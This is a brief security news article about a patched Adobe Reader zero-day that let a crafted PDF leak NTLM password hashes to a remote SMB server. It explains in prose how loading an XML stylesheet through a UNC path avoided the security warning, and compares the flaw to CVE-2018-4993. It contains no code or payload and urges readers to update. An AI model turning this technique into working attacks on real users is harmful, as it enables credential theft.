The zero-day cybersecurity vulnerability that was discovered in Adobe Reader is now patched. By taking advantage of it, it was possible for someone to steal hashed password values.
Originally, the vulnerability was brought to light by Alex Inführ on the 26th of January. Due to various similarities, people have been comparing it to the infamous Bad PDF bug.
From a purely technical standpoint, the vulnerability does not target the software as is. Instead, a weakness in the content embedding feature in the PDF files is utilised for the hackers’ ill deeds. If taken advantage of, the weakness allows an attacker to automatically send a SMB request to a malicious server at the point of opening the document.
As soon as the malicious file is opened, NTLM hash can be remotely stolen. This is known as the “phoning home” manoeuvre by which they not only receive an alert as soon as the document is opened but also steal the hashed values on demand.
The researchers note that the zero-day exploit is identical to CVE-2018-4993. However, it’s in a different place. While the Bad PDF used to rely on using an /F entry to load a remote file, the new exploit tries to open an XML stylesheet through SMB. In normal circumstances, this would trigger a security warning, but by entering a UNC path, the procedure is triggered without one.
Reportedly, older versions of Adobe Reader are impacted as well, so you are strongly encouraged to update as soon as possible.